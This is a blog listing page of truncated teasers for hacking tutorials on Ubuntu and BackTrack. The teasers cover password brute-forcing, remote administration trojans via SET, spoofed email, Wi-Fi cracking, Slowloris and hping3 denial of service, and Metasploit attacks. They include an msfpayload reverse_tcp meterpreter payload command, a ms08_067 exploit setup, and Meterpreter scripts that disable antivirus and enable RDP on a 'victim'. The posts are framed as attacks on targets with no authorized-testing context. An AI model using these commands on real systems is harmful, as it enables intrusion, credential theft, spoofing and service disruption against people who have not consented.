Showing posts with label UBUNTU. Show all posts
Showing posts with label UBUNTU. Show all posts
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Brute-Force attack using HYDRA

What is BRUTE-FORCE attack ?A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries...
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How to use R.A.T. through S.E.T?

RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).(1)Open your terminal & typecd /opt/set./set(2)update...
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How to install & configure send mail in Ubuntu?

Send mail is program which will help you to send email through command, you can send email from terminal or CMD . In this program we use our machine as a server. I will show you how to install & configure Send-Mail. So we can spoof email to targets. But problem is that this email is detected as spam due to automatic...
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How to install social engineering toolkit(S.E.T.) in ubuntu?

Social Engineering Tool kit is cool tool which came with BACKTRACK, this increase power of metasploit. If you are on any linux system other than BACKTRACK , then you can install it .Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method. Extra package...
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How to scan web-server with Nikto?

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration...
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how to Browser Autopwn attack in metasploit?

In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against...
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How to crack wi-fi password in ubuntu?

For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s(1)install aircracksudo apt-get install aircrack-ng (2) You need to go in root first. For this purpose type “sudo su -“ and type your password. (3)now type following command in terminalCode: # iwconfig wlan0 mode monitoring Note:...
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How to use latest java vulnerability to hack remote p.c. ?

Today we are going to use metasploit again. We can hack remote computer using java applet to run code outside send-box. This vulnerability is new. It` s applicable to java version 7 and earlier.(1)To use this vulnerability first update your metasploit modules by runnig command msfupdate in your terminal(2)Now after update...
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How to crack any hash with help of online services?

How to crack any hash with help of online services? try to crack different types of hashes using free online services.(1)Download it from here .(2)Open terminal & change directory where you download tool , if we download tool in download folder then type in following command in terminalcd Downloads(3)python...
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how to crack md5 hash in ubuntu?

If you have an password in md5 hash and you need password in plain text for this there is lot of tool and online websites too but they wont crack all md5 hash if your hash exist in thier database they will give u plain text password but if not than u have to use some tool like here.We are using a perl script to crack an...
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How to install & use SLOWLORIS in ubuntu?

(1)Open a browser and go to this URL: ‘‘ (here you can know more about what is SLOWLORIS, & what it can do)(2)Scroll down to the bottom of the page and right click, the slowloris link ‘save link as’ and save the file to your desktop.(3)Open a terminal and type this command: cd Desktop and...
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Here is SQL injection tools for linux. It`s SQLMAP. SQLMAP is python based tool , so you can run in any os which has python installed.So it also works in windows.SQLMAP is far more advanced than HAVIJ.How To Use SqlMap?(1)Download SQLMAP here.(2)Now extract it wherever you want.(3)Change directory & I mean if you extract...
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Some of the Cool Metasploit Metrepreter script

GetcountermeasureGetcountermeasure is an automated script Disable security measures such as antivirus, firewall, and more.Command:- run getcountermeasureGetguigetgui script is used to enable RDP on a target system.Command:- run getgui -eGetTelnetgettelnet script is used to enable telnet on the victim.Command:-...
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How to jam WIFI network in UBUNTU & BACK TRACK?

If you have UBUNTU or BACK TRACK installed ,then you can start from step 7 directly you can skip first six step. If you have windows user start from here.Step 1: Download Backtrack 5 R2 here as .iso for 32 bit: 64 bit:
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Hack Linux OS using METASPLOIT

The most common use of msfpayload tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.msfpayload linux/x86/meterpreter/reverse_tcp lhost= lport=4444 x > /root/Desktop/facebookNow...
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How to Find Email-Address of the domain using metasploit?

First open your terminal & Type following commandmsfconsoleuse auxiliary/gather/search_email_collector show options The next step you need to set up the domain you want to locate the email address.When we finished setup the domain, the default searching engine that will be use for this searching are Google, Bing,...
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Some Metasploit Attacks

today i will show you Some metasploit attacks.Requirement:-Backtrack.Metasploit.These are just some commands ,there are lots of options in metasploit. Acoording to vulnarability you can use it.Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote controluse windows/smb/ms08_067_netapishow optiosset RHOST...
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DOS attack from linux using hping3.

I am here to explain the DoS attacks (with practicals). You all know about DoS attack, Denial-of-Service Attacks. In this attack, attacker denies the user to use a particular service. You can have many tools for DoS attacks, but I'm gonna teach you a simple method for stress testing on the service.We need Hping3 (It is...
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HOW TO run .Exe files with wine ?

If you run a .exe file with wine and see The file '/home/[username]/example.exe' is not marked as executable. If this was downloaded or copied form an untrusted source, it may be dangerous to run.For more details, read about the executable bit.or anything like that then: This tutorial is for you!EDIT: (Actually, this will...